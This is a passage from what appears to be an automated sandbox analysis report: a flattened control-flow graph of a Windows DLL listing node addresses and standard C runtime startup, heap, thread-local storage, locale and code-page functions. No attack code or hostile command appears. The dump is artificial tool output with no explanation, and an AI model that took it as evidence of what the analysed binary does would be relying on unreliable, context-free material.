19817->19821 19819 6fa75348 _realloc 62 API calls 19818->19819 19819->19821 19820->19821 19822 6fa7f000 19820->19822 19821->19759 19823 6fa7536e __dosmaperr 62 API calls 19822->19823 19823->19821 19825 6fa7a206 __getptd_noexit 62 API calls 19824->19825 19826 6fa7a287 19825->19826 19827 6fa7a294 GetConsoleMode 19826->19827 19828 6fa75bff __amsg_exit 62 API calls 19826->19828 19827->19769 19827->19779 19828->19827 19850 6fa8094c 19829->19850 19833 6fa7535b __close 62 API calls 19832->19833 19834 6fa75379 _realloc 19833->19834 19835 6fa75348 _realloc 62 API calls 19834->19835 19836 6fa7538c 19835->19836 19836->19781 19838 6fa8196f 19837->19838 19839 6fa81957 19837->19839 19842 6fa7535b __close 62 API calls 19838->19842 19849 6fa819b4 19838->19849 19840 6fa7535b __close 62 API calls 19839->19840 19841 6fa8195c 19840->19841 19843 6fa75348 _realloc 62 API calls 19841->19843 19844 6fa8199d 19842->19844 19845 6fa81964 19843->19845 19846 6fa75348 _realloc 62 API calls 19844->19846 19845->19816 19847 6fa819a4 19846->19847 19848 6fa7815c __close 6 API calls 19847->19848 19848->19849 19849->19816 19851 6fa78659 _LocaleUpdate::_LocaleUpdate 72 API calls 19850->19851 19852 6fa8095f 19851->19852 19852->19801 19853->19809 19857 6fa81a61 LeaveCriticalSection 19854->19857 19856 6fa7f143 19856->19726 19857->19856 19860 6fa67352 __EH_prolog3_catch_GS 19858->19860 19859 6fa67381 ctype 19864 6fa751c4 19859->19864 19860->19859 19861 6fa67202 ctype 66 API calls 19860->19861 19861->19859 19865 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19864->19865 19866 6fa751ce 19865->19866 19866->19866 19867 6fa872b3 19870 6fa68495 19867->19870 19871 6fa6aef1 ___DllMainCRTStartup 31 API calls 19870->19871 19872 6fa684a0 19871->19872 19873 6fa6c220 ___DllMainCRTStartup 7 API calls 19872->19873 19874 6fa684a9 19873->19874 19875 6fa6bbbf ___DllMainCRTStartup 2 API calls 19874->19875 19876 6fa684b4 19875->19876 19877 6fa6c292 ___DllMainCRTStartup 3 API calls 19876->19877 19878 6fa684bb 19877->19878 19879 6fa7498c 19880 6fa74997 19879->19880 19881 6fa7499c 19879->19881 19897 6fa7be02 19880->19897 19885 6fa74896 19881->19885 19884 6fa749aa 19887 6fa748a2 _realloc 19885->19887 19886 6fa748ef 19894 6fa7493f _realloc 19886->19894 19948 6fa66894 19886->19948 19887->19886 19887->19894 19901 6fa74761 19887->19901 19891 6fa7491f 19892 6fa74761 __CRT_INIT@12 155 API calls 19891->19892 19891->19894 19892->19894 19893 6fa66894 ___DllMainCRTStartup 31 API calls 19895 6fa74916 19893->19895 19894->19884 19896 6fa74761 __CRT_INIT@12 155 API calls 19895->19896 19896->19891 19898 6fa7be27 19897->19898 19899 6fa7be34 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 19897->19899 19898->19899 19900 6fa7be2b 19898->19900 19899->19900 19900->19881 19902 6fa74770 19901->19902 19903 6fa747ec 19901->19903 19952 6fa7a6f4 HeapCreate 19902->19952 19905 6fa74823 19903->19905 19906 6fa747f2 19903->19906 19907 6fa74881 19905->19907 19908 6fa74828 19905->19908 19911 6fa7480d 19906->19911 19938 6fa7477b 19906->19938 20085 6fa75e85 19906->20085 19907->19938 20088 6fa7a3c8 19907->20088 19910 6fa7a0ae ___set_flsgetvalue 8 API calls 19908->19910 19913 6fa7482d 19910->19913 19918 6fa7b77d __ioterm 63 API calls 19911->19918 19911->19938 19916 6fa7a608 __calloc_crt 62 API calls 19913->19916 19920 6fa74839 19916->19920 19917 6fa74787 __RTC_Initialize 19924 6fa74797 GetCommandLineA 19917->19924 19941 6fa7478b 19917->19941 19919 6fa74817 19918->19919 19921 6fa7a0e2 __mtterm 65 API calls 19919->19921 19925 6fa7a033 __decode_pointer 6 API calls 19920->19925 19920->19938 19923 6fa7481c 19921->19923 19926 6fa7a724 __heap_term 4 API calls 19923->19926 19988 6fa7bafe 19924->19988 19928 6fa74857 19925->19928 19926->19938 19931 6fa74875 19928->19931 19932 6fa7485e 19928->19932 19935 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 19931->19935 19934 6fa7a11f __mtinit 62 API calls 19932->19934 19933 6fa747b1 19936 6fa747b5 19933->19936 20029 6fa7ba43 19933->20029 19937 6fa74865 GetCurrentThreadId 19934->19937 19935->19938 20069 6fa7a0e2 19936->20069 19937->19938 19938->19886 20063 6fa7a724 19941->20063 19943 6fa747d5 19943->19938 20080 6fa7b77d 19943->20080 19949 6fa668a2 19948->19949 19950 6fa667cb 19948->19950 19949->19950 19951 6fa6aef1 ___DllMainCRTStartup 31 API calls 19949->19951 19950->19891 19950->19893 19951->19950 19953 6fa74776 19952->19953 19953->19938 19954 6fa7a436 GetModuleHandleW 19953->19954 19955 6fa7a451 19954->19955 19956 6fa7a44a 19954->19956 19958 6fa7a45b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 19955->19958 19959 6fa7a5b9 19955->19959 19957 6fa75bcf __crt_waiting_on_module_handle 2 API calls 19956->19957 19960 6fa7a450 19957->19960 19961 6fa7a4a4 TlsAlloc 19958->19961 19962 6fa7a0e2 __mtterm 65 API calls 19959->19962 19960->19955 19964 6fa7a5be 19961->19964 19965 6fa7a4f2 TlsSetValue 19961->19965 19962->19964 19964->19917 19965->19964 19966 6fa7a503 19965->19966 20099 6fa75e94 19966->20099 19969 6fa79fb8 __encode_pointer 6 API calls 19970 6fa7a513 19969->19970 19971 6fa79fb8 __encode_pointer 6 API calls 19970->19971 19972 6fa7a523 19971->19972 19973 6fa79fb8 __encode_pointer 6 API calls 19972->19973 19974 6fa7a533 19973->19974 19975 6fa79fb8 __encode_pointer 6 API calls 19974->19975 19976 6fa7a543 19975->19976 20106 6fa7a798 19976->20106 19979 6fa7a033 __decode_pointer 6 API calls 19980 6fa7a564 19979->19980 19980->19959 19981 6fa7a608 __calloc_crt 62 API calls 19980->19981 19982 6fa7a57d 19981->19982 19982->19959 19983 6fa7a033 __decode_pointer 6 API calls 19982->19983 19984 6fa7a597 19983->19984 19984->19959 19985 6fa7a59e 19984->19985 19986 6fa7a11f __mtinit 62 API calls 19985->19986 19987 6fa7a5a6 GetCurrentThreadId 19986->19987 19987->19964 19989 6fa7bb1c GetEnvironmentStringsW 19988->19989 19992 6fa7bb3b 19988->19992 19990 6fa7bb24 19989->19990 19991 6fa7bb30 GetLastError 19989->19991 19995 6fa7bb57 GetEnvironmentStringsW 19990->19995 19996 6fa7bb66 WideCharToMultiByte 19990->19996 19991->19992 19992->19990 19994 6fa7bbd4 19992->19994 19993 6fa7bbdd GetEnvironmentStrings 19997 6fa747a7 19993->19997 19998 6fa7bbed 19993->19998 19994->19993 19994->19997 19995->19996 19995->19997 20000 6fa7bb9a 19996->20000 20001 6fa7bbc9 FreeEnvironmentStringsW 19996->20001 20014 6fa7b529 19997->20014 20003 6fa7a5c3 __malloc_crt 62 API calls 19998->20003 20004 6fa7a5c3 __malloc_crt 62 API calls 20000->20004 20001->19997 20005 6fa7bc07 20003->20005 20006 6fa7bba0 20004->20006 20007 6fa7bc0e FreeEnvironmentStringsA 20005->20007 20008 6fa7bc1a ___crtGetEnvironmentStringsA 20005->20008 20006->20001 20009 6fa7bba8 WideCharToMultiByte 20006->20009 20007->19997 20012 6fa7bc24 FreeEnvironmentStringsA 20008->20012 20010 6fa7bbc2 20009->20010 20011 6fa7bbba 20009->20011 20010->20001 20013 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20011->20013 20012->19997 20013->20010 20113 6fa753bc 20014->20113 20016 6fa7b535 GetStartupInfoA 20017 6fa7a608 __calloc_crt 62 API calls 20016->20017 20025 6fa7b556 20017->20025 20018 6fa7b774 _realloc 20018->19933 20019 6fa7b6bb 20019->20018 20020 6fa7b6f1 GetStdHandle 20019->20020 20022 6fa7b756 SetHandleCount 20019->20022 20024 6fa7b703 GetFileType 20019->20024 20027 6fa7e1d3 __mtinitlocknum InitializeCriticalSectionAndSpinCount 20019->20027 20020->20019 20021 6fa7b63e 20021->20018 20021->20019 20026 6fa7b667 GetFileType 20021->20026 20028 6fa7e1d3 __mtinitlocknum InitializeCriticalSectionAndSpinCount 20021->20028 20022->20018 20023 6fa7a608 __calloc_crt 62 API calls 20023->20025 20024->20019 20025->20018 20025->20019 20025->20021 20025->20023 20026->20021 20027->20019 20028->20021 20030 6fa7ba5d GetModuleFileNameA 20029->20030 20031 6fa7ba58 20029->20031 20033 6fa7ba84 20030->20033 20120 6fa802ad 20031->20120 20114 6fa7b8a9 20033->20114 20036 6fa747c1 20036->19943 20042 6fa7b7cb 20036->20042 20037 6fa7bac0 20038 6fa7a5c3 __malloc_crt 62 API calls 20037->20038 20039 6fa7bac6 20038->20039 20039->20036 20040 6fa7b8a9 _parse_cmdline 72 API calls 20039->20040 20041 6fa7bae0 20040->20041 20041->20036 20043 6fa7b7d4 20042->20043 20046 6fa7b7d9 _strlen 20042->20046 20044 6fa802ad ___initmbctable 106 API calls 20043->20044 20044->20046 20045 6fa7a608 __calloc_crt 62 API calls 20051 6fa7b80e _strlen 20045->20051 20046->20045 20049 6fa747ca 20046->20049 20047 6fa7b86c 20048 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20047->20048 20048->20049 20049->19943 20057 6fa75cbe 20049->20057 20050 6fa7a608 __calloc_crt 62 API calls 20050->20051 20051->20047 20051->20049 20051->20050 20052 6fa7b892 20051->20052 20054 6fa80997 _strcpy_s 62 API calls 20051->20054 20055 6fa7b853 20051->20055 20053 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20052->20053 20053->20049 20054->20051 20055->20051 20056 6fa78034 __invoke_watson 10 API calls 20055->20056 20056->20055 20058 6fa75ccc __IsNonwritableInCurrentImage 20057->20058 20407 6fa7df82 20058->20407 20060 6fa75cea __initterm_e 20062 6fa75d09 __IsNonwritableInCurrentImage __initterm 20060->20062 20411 6fa744b4 20060->20411 20062->19943 20064 6fa7a784 HeapDestroy 20063->20064 20065 6fa7a72d 20063->20065 20064->19938 20066 6fa7a772 HeapFree 20065->20066 20067 6fa7a749 VirtualFree HeapFree 20065->20067 20066->20064 20067->20067 20068 6fa7a771 20067->20068 20068->20066 20070 6fa7a0f8 20069->20070 20071 6fa7a0ec 20069->20071 20073 6fa7a10c TlsFree 20070->20073 20074 6fa7a11a 20070->20074 20072 6fa7a033 __decode_pointer 6 API calls 20071->20072 20072->20070 20073->20074 20075 6fa7a7ff DeleteCriticalSection 20074->20075 20076 6fa7a817 20074->20076 20077 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20075->20077 20078 6fa7a829 DeleteCriticalSection 20076->20078 20079 6fa7a837 20076->20079 20077->20074 20078->20076 20079->19941 20082 6fa7b786 20080->20082 20081 6fa7b7c8 20081->19936 20082->20081 20083 6fa7b79a DeleteCriticalSection 20082->20083 20084 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20082->20084 20083->20082 20084->20082 20457 6fa75d43 20085->20457 20087 6fa75e90 20087->19911 20089 6fa7a3d6 20088->20089 20090 6fa7a421 20088->20090 20093 6fa7a3dc TlsGetValue 20089->20093 20096 6fa7a3ff 20089->20096 20091 6fa7a434 20090->20091 20092 6fa7a42b TlsSetValue 20090->20092 20091->19938 20092->20091 20094 6fa7a3ef TlsGetValue 20093->20094 20093->20096 20094->20096 20095 6fa7a033 __decode_pointer 6 API calls 20097 6fa7a416 20095->20097 20096->20095 20480 6fa7a299 20097->20480 20100 6fa7a02a FindHandlerForForeignException 6 API calls 20099->20100 20101 6fa75e9c __init_pointers __initp_misc_winsig 20100->20101 20110 6fa7cdf3 20101->20110 20104 6fa79fb8 __encode_pointer 6 API calls 20105 6fa75ed8 20104->20105 20105->19969 20107 6fa7a7a3 20106->20107 20108 6fa7e1d3 __mtinitlocknum InitializeCriticalSectionAndSpinCount 20107->20108 20109 6fa7a550 20107->20109 20108->20107 20109->19959 20109->19979 20111 6fa79fb8 __encode_pointer 6 API calls 20110->20111 20112 6fa75ece 20111->20112 20112->20104 20113->20016 20115 6fa7b8c8 20114->20115 20119 6fa7b935 20115->20119 20124 6fa80a52 20115->20124 20117 6fa7ba33 20117->20036 20117->20037 20118 6fa80a52 72 API calls _parse_cmdline 20118->20119 20119->20117 20119->20118 20121 6fa802b6 20120->20121 20123 6fa802bd 20120->20123 20229 6fa80113 20121->20229 20123->20030 20127 6fa809ff 20124->20127 20130 6fa78659 20127->20130 20131 6fa7866c 20130->20131 20135 6fa786b9 20130->20135 20132 6fa7a27f __getptd 62 API calls 20131->20132 20133 6fa78671 20132->20133 20134 6fa78699 20133->20134 20138 6fa8057a 20133->20138 20134->20135 20153 6fa7fe0e 20134->20153 20135->20115 20139 6fa80586 _realloc 20138->20139 20140 6fa7a27f __getptd 62 API calls 20139->20140 20141 6fa8058b 20140->20141 20142 6fa805b9 20141->20142 20144 6fa8059d 20141->20144 20143 6fa7a914 __lock 62 API calls 20142->20143 20145 6fa805c0 20143->20145 20146 6fa7a27f __getptd 62 API calls 20144->20146 20169 6fa8053c 20145->20169 20148 6fa805a2 20146->20148 20151 6fa805b0 _realloc 20148->20151 20152 6fa75bff __amsg_exit 62 API calls 20148->20152 20151->20134 20152->20151 20154 6fa7fe1a _realloc 20153->20154 20155 6fa7a27f __getptd 62 API calls 20154->20155 20156 6fa7fe1f 20155->20156 20157 6fa7a914 __lock 62 API calls 20156->20157 20158 6fa7fe31 20156->20158 20159 6fa7fe4f 20157->20159 20160 6fa7fe3f _realloc 20158->20160 20162 6fa75bff __amsg_exit 62 API calls 20158->20162 20161 6fa7fe98 20159->20161 20164 6fa7fe66 InterlockedDecrement 20159->20164 20165 6fa7fe80 InterlockedIncrement 20159->20165 20160->20135 20225 6fa7fea9 20161->20225 20162->20160 20164->20165 20166 6fa7fe71 20164->20166 20165->20161 20166->20165 20167 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20166->20167 20168 6fa7fe7f 20167->20168 20168->20165 20170 6fa80540 20169->20170 20171 6fa80572 20169->20171 20170->20171 20172 6fa80414 ___addlocaleref 8 API calls 20170->20172 20177 6fa805e4 20171->20177 20173 6fa80553 20172->20173 20173->20171 20180 6fa804a3 20173->20180 20224 6fa7a83a LeaveCriticalSection 20177->20224 20179 6fa805eb 20179->20148 20181 6fa804b4 InterlockedDecrement 20180->20181 20182 6fa80537 20180->20182 20183 6fa804c9 InterlockedDecrement 20181->20183 20184 6fa804cc 20181->20184 20182->20171 20194 6fa802cb 20182->20194 20183->20184 20185 6fa804d9 20184->20185 20186 6fa804d6 InterlockedDecrement 20184->20186 20187 6fa804e3 InterlockedDecrement 20185->20187 20188 6fa804e6 20185->20188 20186->20185 20187->20188 20189 6fa804f0 InterlockedDecrement 20188->20189 20191 6fa804f3 20188->20191 20189->20191 20190 6fa8050c InterlockedDecrement 20190->20191 20191->20190 20192 6fa8051c InterlockedDecrement 20191->20192 20193 6fa80527 InterlockedDecrement 20191->20193 20192->20191 20193->20182 20195 6fa8034f 20194->20195 20199 6fa802e2 20194->20199 20197 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20195->20197 20198 6fa8039c 20195->20198 20196 6fa803c3 20206 6fa80408 20196->20206 20220 6fa74618 62 API calls ___crtGetEnvironmentStringsA 20196->20220 20201 6fa80370 20197->20201 20198->20196 20200 6fa82365 ___free_lc_time 62 API calls 20198->20200 20199->20195 20205 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20199->20205 20207 6fa80316 20199->20207 20202 6fa803bc 20200->20202 20203 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20201->20203 20204 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20202->20204 20208 6fa80383 20203->20208 20204->20196 20210 6fa8030b 20205->20210 20211 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20206->20211 20212 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20207->20212 20223 6fa80337 20207->20223 20213 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20208->20213 20209 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20214 6fa80344 20209->20214 20216 6fa8253f ___free_lconv_mon 62 API calls 20210->20216 20217 6fa8040e 20211->20217 20218 6fa8032c 20212->20218 20219 6fa80391 20213->20219 20215 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20214->20215 20215->20195 20216->20207 20217->20171 20221 6fa824fa ___free_lconv_num 62 API calls 20218->20221 20222 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20219->20222 20220->20196 20221->20223 20222->20198 20223->20209 20224->20179 20228 6fa7a83a LeaveCriticalSection 20225->20228 20227 6fa7feb0 20227->20158 20228->20227 20230 6fa8011f _realloc 20229->20230 20231 6fa7a27f __getptd 62 API calls 20230->20231 20232 6fa80128 20231->20232 20233 6fa7fe0e __setmbcp 64 API calls 20232->20233 20234 6fa80132 20233->20234 20260 6fa7feb2 20234->20260 20237 6fa7a5c3 __malloc_crt 62 API calls 20238 6fa80153 20237->20238 20239 6fa80272 _realloc 20238->20239 20267 6fa7ff2e 20238->20267 20239->20123 20242 6fa8027f 20242->20239 20246 6fa80292 20242->20246 20248 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20242->20248 20243 6fa80183 InterlockedDecrement 20244 6fa80193 20243->20244 20245 6fa801a4 InterlockedIncrement 20243->20245 20244->20245 20250 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20244->20250 20245->20239 20247 6fa801ba 20245->20247 20249 6fa75348 _realloc 62 API calls 20246->20249 20247->20239 20252 6fa7a914 __lock 62 API calls 20247->20252 20248->20246 20249->20239 20251 6fa801a3 20250->20251 20251->20245 20254 6fa801ce InterlockedDecrement 20252->20254 20255 6fa8024a 20254->20255 20256 6fa8025d InterlockedIncrement 20254->20256 20255->20256 20258 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20255->20258 20277 6fa80274 20256->20277 20259 6fa8025c 20258->20259 20259->20256 20261 6fa78659 _LocaleUpdate::_LocaleUpdate 72 API calls 20260->20261 20262 6fa7fec6 20261->20262 20263 6fa7fed1 GetOEMCP 20262->20263 20264 6fa7feef 20262->20264 20265 6fa7fee1 20263->20265 20264->20265 20266 6fa7fef4 GetACP 20264->20266 20265->20237 20265->20239 20266->20265 20268 6fa7feb2 getSystemCP 74 API calls 20267->20268 20270 6fa7ff4e 20268->20270 20269 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20271 6fa80111 20269->20271 20272 6fa7ff9d IsValidCodePage 20270->20272 20274 6fa7ff59 setSBCS 20270->20274 20276 6fa7ffc2 _memset __setmbcp_nolock 20270->20276 20271->20242 20271->20243 20273 6fa7ffaf GetCPInfo 20272->20273 20272->20274 20273->20274 20273->20276 20274->20269 20280 6fa7fc7b GetCPInfo 20276->20280 20406 6fa7a83a LeaveCriticalSection 20277->20406 20279 6fa8027b 20279->20239 20281 6fa7fd61 20280->20281 20284 6fa7fcaf _memset 20280->20284 20286 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20281->20286 20290 6fa82323 20284->20290 20288 6fa7fe0c 20286->20288 20288->20276 20289 6fa82124 ___crtLCMapStringA 97 API calls 20289->20281 20291 6fa78659 _LocaleUpdate::_LocaleUpdate 72 API calls 20290->20291 20292 6fa82336 20291->20292 20300 6fa82169 20292->20300 20295 6fa82124 20296 6fa78659 _LocaleUpdate::_LocaleUpdate 72 API calls 20295->20296 20297 6fa82137 20296->20297 20359 6fa81d7f 20297->20359 20301 6fa8218a GetStringTypeW 20300->20301 20302 6fa821b5 20300->20302 20303 6fa821aa GetLastError 20301->20303 20304 6fa821a2 20301->20304 20302->20304 20305 6fa8229c 20302->20305 20303->20302 20306 6fa821ee MultiByteToWideChar 20304->20306 20322 6fa82296 20304->20322 20328 6fa84dbc GetLocaleInfoA 20305->20328 20312 6fa8221b 20306->20312 20306->20322 20308 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20310 6fa7fd1c 20308->20310 20310->20295 20311 6fa822ed GetStringTypeA 20317 6fa82308 20311->20317 20311->20322 20313 6fa82230 _memset __crtGetStringTypeA_stat 20312->20313 20314 6fa749fe _malloc 62 API calls 20312->20314 20316 6fa82269 MultiByteToWideChar 20313->20316 20313->20322 20314->20313 20320 6fa8227f GetStringTypeW 20316->20320 20321 6fa82290 20316->20321 20318 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20317->20318 20318->20322 20320->20321 20324 6fa81006 20321->20324 20322->20308 20325 6fa81012 20324->20325 20327 6fa81023 20324->20327 20326 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20325->20326 20325->20327 20326->20327 20327->20322 20329 6fa84dea 20328->20329 20330 6fa84def 20328->20330 20332 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20329->20332 20331 6fa81026 ___ansicp 85 API calls 20330->20331 20331->20329 20333 6fa822c0 20332->20333 20333->20311 20333->20322 20334 6fa84e05 20333->20334 20335 6fa84ecf 20334->20335 20336 6fa84e45 GetCPInfo 20334->20336 20339 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20335->20339 20337 6fa84eba MultiByteToWideChar 20336->20337 20338 6fa84e5c 20336->20338 20337->20335 20343 6fa84e75 _strlen 20337->20343 20338->20337 20340 6fa84e62 GetCPInfo 20338->20340 20341 6fa822e1 20339->20341 20340->20337 20342 6fa84e6f 20340->20342 20341->20311 20341->20322 20342->20337 20342->20343 20344 6fa749fe _malloc 62 API calls 20343->20344 20348 6fa84ea7 _memset __crtGetStringTypeA_stat 20343->20348 20344->20348 20345 6fa84f04 MultiByteToWideChar 20346 6fa84f3b 20345->20346 20347 6fa84f1c 20345->20347 20349 6fa81006 __freea 62 API calls 20346->20349 20350 6fa84f40 20347->20350 20351 6fa84f23 WideCharToMultiByte 20347->20351 20348->20335 20348->20345 20349->20335 20352 6fa84f4b WideCharToMultiByte 20350->20352 20353 6fa84f5f 20350->20353 20351->20346 20352->20346 20352->20353 20354 6fa7a608 __calloc_crt 62 API calls 20353->20354 20355 6fa84f67 20354->20355 20355->20346 20356 6fa84f70 WideCharToMultiByte 20355->20356 20356->20346 20357 6fa84f82 20356->20357 20358 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20357->20358 20358->20346 20360 6fa81da0 LCMapStringW 20359->20360 20363 6fa81dbb 20359->20363 20361 6fa81dc3 GetLastError 20360->20361 20360->20363 20361->20363 20362 6fa81fb9 20365 6fa84dbc ___ansicp 86 API calls 20362->20365 20363->20362 20364 6fa81e15 20363->20364 20366 6fa81e2e MultiByteToWideChar 20364->20366 20380 6fa81fb0 20364->20380 20367 6fa81fe1 20365->20367 20372 6fa81e5b 20366->20372 20366->20380 20370 6fa81ffa 20367->20370 20371 6fa820d5 LCMapStringA 20367->20371 20367->20380 20368 6fa73f34 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 20369 6fa7fd3c 20368->20369 20369->20289 20373 6fa84e05 ___convertcp 69 API calls 20370->20373 20387 6fa82031 20371->20387 20375 6fa749fe _malloc 62 API calls 20372->20375 20386 6fa81e74 __crtGetStringTypeA_stat 20372->20386 20376 6fa8200c 20373->20376 20374 6fa81eac MultiByteToWideChar 20377 6fa81fa7 20374->20377 20378 6fa81ec5 LCMapStringW 20374->20378 20375->20386 20376->20380 20382 6fa82016 LCMapStringA 20376->20382 20383 6fa81006 __freea 62 API calls 20377->20383 20378->20377 20384 6fa81ee6 20378->20384 20379 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20381 6fa820fc 20379->20381 20380->20368 20381->20380 20388 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20381->20388 20382->20387 20392 6fa82038 20382->20392 20383->20380 20385 6fa81eef 20384->20385 20391 6fa81f18 20384->20391 20385->20377 20389 6fa81f01 LCMapStringW 20385->20389 20386->20374 20386->20380 20387->20379 20387->20381 20388->20380 20389->20377 20390 6fa81f67 LCMapStringW 20393 6fa81f7f WideCharToMultiByte 20390->20393 20394 6fa81fa1 20390->20394 20396 6fa81f33 __crtGetStringTypeA_stat 20391->20396 20398 6fa749fe _malloc 62 API calls 20391->20398 20395 6fa749fe _malloc 62 API calls 20392->20395 20397 6fa82049 _memset __crtGetStringTypeA_stat 20392->20397 20393->20394 20399 6fa81006 __freea 62 API calls 20394->20399 20395->20397 20396->20377 20396->20390 20397->20387 20400 6fa82087 LCMapStringA 20397->20400 20398->20396 20399->20377 20402 6fa820a3 20400->20402 20403 6fa820a7 20400->20403 20405 6fa81006 __freea 62 API calls 20402->20405 20404 6fa84e05 ___convertcp 69 API calls 20403->20404 20404->20402 20405->20387 20406->20279 20408 6fa7df88 20407->20408 20409 6fa79fb8 __encode_pointer 6 API calls 20408->20409 20410 6fa7dfa0 20408->20410 20409->20408 20410->20060 20414 6fa74478 20411->20414 20413 6fa744c1 20413->20062 20415 6fa74484 _realloc 20414->20415 20422 6fa75c6b 20415->20422 20421 6fa744a5 _realloc 20421->20413 20423 6fa7a914 __lock 62 API calls 20422->20423 20424 6fa74489 20423->20424 20425 6fa7438d 20424->20425 20426 6fa7a033 __decode_pointer 6 API calls 20425->20426 20427 6fa743a1 20426->20427 20428 6fa7a033 __decode_pointer 6 API calls 20427->20428 20429 6fa743b1 20428->20429 20430 6fa74434 20429->20430 20431 6fa77637 __onexit_nolock 63 API calls 20429->20431 20445 6fa744ae 20430->20445 20432 6fa743cf 20431->20432 20433 6fa7441b 20432->20433 20436 6fa743ea 20432->20436 20437 6fa743f9 20432->20437 20434 6fa79fb8 __encode_pointer 6 API calls 20433->20434 20435 6fa74429 20434->20435 20438 6fa79fb8 __encode_pointer 6 API calls 20435->20438 20448 6fa7a654 20436->20448 20437->20430 20440 6fa743f3 20437->20440 20438->20430 20440->20437 20441 6fa7a654 __realloc_crt 72 API calls 20440->20441 20442 6fa7440f 20440->20442 20443 6fa74409 20441->20443 20444 6fa79fb8 __encode_pointer 6 API calls 20442->20444 20443->20430 20443->20442 20444->20433 20453 6fa75c74 20445->20453 20452 6fa7a65d 20448->20452 20449 6fa74ac8 _realloc 71 API calls 20449->20452 20450 6fa7a69c 20450->20440 20451 6fa7a67d Sleep 20451->20452 20452->20449 20452->20450 20452->20451 20456 6fa7a83a LeaveCriticalSection 20453->20456 20455 6fa744b3 20455->20421 20456->20455 20458 6fa75d4f _realloc 20457->20458 20459 6fa7a914 __lock 62 API calls 20458->20459 20460 6fa75d56 20459->20460 20463 6fa7a033 __decode_pointer 6 API calls 20460->20463 20465 6fa75e0f __initterm 20460->20465 20464 6fa75d8d 20463->20464 20464->20465 20469 6fa7a033 __decode_pointer 6 API calls 20464->20469 20474 6fa75e5a 20465->20474 20467 6fa75e57 _realloc 20467->20087 20468 6fa75e4e 20470 6fa75c53 __mtinitlocknum 3 API calls 20468->20470 20473 6fa75da2 20469->20473 20470->20467 20471 6fa7a02a 6 API calls FindHandlerForForeignException 20471->20473 20472 6fa7a033 6 API calls __decode_pointer 20472->20473 20473->20465 20473->20471 20473->20472 20475 6fa75e60 20474->20475 20476 6fa75e3b 20474->20476 20479 6fa7a83a LeaveCriticalSection 20475->20479 20476->20467 20478 6fa7a83a LeaveCriticalSection 20476->20478 20478->20468 20479->20476 20481 6fa7a2a5 _realloc 20480->20481 20482 6fa7a3a7 _realloc 20481->20482 20483 6fa7a2bd 20481->20483 20485 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20481->20485 20482->20090 20484 6fa7a2cb 20483->20484 20486 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20483->20486 20487 6fa7a2d9 20484->20487 20488 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20484->20488 20485->20483 20486->20484 20489 6fa7a2e7 20487->20489 20490 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20487->20490 20488->20487 20491 6fa7a2f5 20489->20491 20493 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20489->20493 20490->20489 20492 6fa7a303 20491->20492 20494 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20491->20494 20495 6fa7a311 20492->20495 20496 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20492->20496 20493->20491 20494->20492 20497 6fa7a322 20495->20497 20498 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20495->20498 20496->20495 20499 6fa7a914 __lock 62 API calls 20497->20499 20498->20497 20500 6fa7a32a 20499->20500 20501 6fa7a336 InterlockedDecrement 20500->20501 20502 6fa7a34f 20500->20502 20501->20502 20503 6fa7a341 20501->20503 20516 6fa7a3b3 20502->20516 20503->20502 20506 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20503->20506 20506->20502 20507 6fa7a914 __lock 62 API calls 20508 6fa7a363 20507->20508 20509 6fa7a394 20508->20509 20511 6fa804a3 ___removelocaleref 8 API calls 20508->20511 20519 6fa7a3bf 20509->20519 20514 6fa7a378 20511->20514 20513 6fa74618 ___crtGetEnvironmentStringsA 62 API calls 20513->20482 20514->20509 20515 6fa802cb ___freetlocinfo 62 API calls 20514->20515 20515->20509 20522 6fa7a83a LeaveCriticalSection 20516->20522 20518 6fa7a35c 20518->20507 20523 6fa7a83a LeaveCriticalSection 20519->20523 20521 6fa7a3a1 20521->20513 20522->20518 20523->20521

                          Control-flow Graph

                          • Executed
                          • Not Executed
